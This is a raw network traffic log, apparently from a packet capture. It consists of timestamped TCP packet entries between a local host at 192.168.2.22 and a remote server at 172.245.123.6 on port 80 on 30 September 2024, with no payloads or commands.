                                                                                  Sep 30, 2024 10:12:22.811336994 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.811364889 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.811388969 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.811400890 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.811417103 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.811592102 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.811592102 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.811592102 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.811592102 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.812338114 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.812350035 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.812361002 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.812377930 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.812387943 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.812390089 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.812400103 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.812400103 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.812408924 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.812422991 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.812434912 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.813307047 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.813318014 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.813328028 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.813364029 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.813371897 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.813374996 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.813385963 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.813396931 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.813419104 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.813431025 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.816018105 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.819081068 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.901597023 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.901612043 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.901623964 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.901635885 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.901645899 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.901658058 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.901865005 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.901879072 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.901884079 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.901884079 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.901892900 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.901921034 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.901932001 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.901942015 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.901952982 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.901956081 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.901983023 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.902007103 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.902761936 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.902774096 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.902784109 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.902817965 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.902829885 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.902841091 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.902843952 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.902853012 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.902864933 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.902873039 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.902898073 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.902909040 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.903649092 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.903661013 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.903675079 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.903690100 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.903701067 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.903701067 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.903712988 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.903723955 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.903724909 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.903744936 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.903763056 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.904516935 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.904529095 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.904539108 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.904572964 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.904576063 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.904586077 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.904594898 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.904597044 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.904614925 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.904614925 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.904639006 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.904656887 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.905427933 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.905440092 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.905450106 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.905466080 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.905476093 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.905487061 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.905489922 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.905497074 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.905519962 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.905541897 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.906265974 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.906276941 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.906291962 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.906302929 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.906316996 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.906335115 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.906337976 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.906347036 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.906366110 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.906388998 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.906961918 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.910762072 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.912621975 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.992069960 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.992089987 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.992108107 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.992117882 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.992129087 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.992139101 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.992141962 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.992151022 CEST8049166172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:22.992156029 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.992172956 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:22.992185116 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:26.034651041 CEST4916680192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:30.928850889 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:30.933744907 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:30.933847904 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:30.933979988 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:30.938740015 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.423973083 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.423988104 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.423999071 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.424009085 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.424019098 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.424030066 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.424050093 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.424072027 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.424077034 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.424082041 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.424092054 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.424102068 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.424114943 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.424137115 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.427407980 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.429549932 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.429563046 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.429574966 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.429596901 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.429627895 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.515114069 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.515135050 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.515146971 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.515157938 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.515168905 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.515171051 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.515189886 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.515212059 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.515388966 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.515433073 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.515434027 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.515443087 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.515471935 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.515491962 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.515800953 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.515811920 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.515821934 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.515837908 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.515844107 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.515847921 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.515868902 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.515891075 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.516659021 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.516669989 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.516685963 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.516695023 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.516697884 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.516705036 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.516719103 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.516741991 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.517529011 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.517544985 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.517555952 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.517565012 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.517566919 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.517575979 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.517589092 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.517611027 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.519962072 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.519982100 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.520004034 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.520023108 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.534797907 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.605900049 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.605920076 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.605931997 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.605942965 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.605950117 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.605953932 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.605961084 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.605973005 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.605982065 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.605986118 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.606019020 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.606045008 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.606055975 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.606076002 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.606086016 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.606112957 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.606122017 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.606137991 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.606147051 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.606156111 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.606158018 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.606165886 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.606169939 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.606177092 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.606189013 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.606189013 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.606198072 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.606215000 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.606221914 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.606697083 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.606738091 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.606745005 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.606775999 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.606775999 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.606806993 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.606812000 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.606817007 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.606837034 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.606851101 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.606945992 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.606956005 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.606967926 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.606981993 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.606985092 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.606992960 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.607000113 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.607012987 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.607023001 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.607297897 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.607309103 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.607320070 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.607341051 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.607351065 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.607372046 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.607388020 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.607398033 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.607405901 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.607407093 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.607425928 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.607435942 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.607481956 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.607492924 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.607501984 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.607517004 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.607526064 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.607527971 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.607537031 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.607537985 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.607553959 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.607562065 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.607578993 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.608242035 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.608253002 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.608262062 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.608273029 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.608283043 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.608283043 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.608295918 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.608306885 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.696963072 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.696974039 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.696989059 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.696999073 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697009087 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697019100 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697020054 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.697029114 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.697030067 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697040081 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.697041988 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697052002 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697055101 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.697062016 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697067022 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.697072029 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697083950 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.697094917 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.697107077 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.697165012 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.697376013 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697386980 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697397947 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697428942 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.697438002 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.697454929 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697464943 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697480917 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697489023 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.697490931 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697501898 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697503090 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.697511911 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697520018 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.697526932 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697537899 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.697546959 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.697562933 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.697973967 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697984934 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.697994947 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698034048 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698040009 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.698045015 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698055983 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698061943 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.698066950 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698075056 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.698086977 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.698102951 CEST4916780192.168.2.22172.245.123.6
                                                                                  Sep 30, 2024 10:12:31.698153973 CEST8049167172.245.123.6192.168.2.22
                                                                                  Sep 30, 2024 10:12:31.698163986 CEST8049167172.245.123.6192.168.2.22
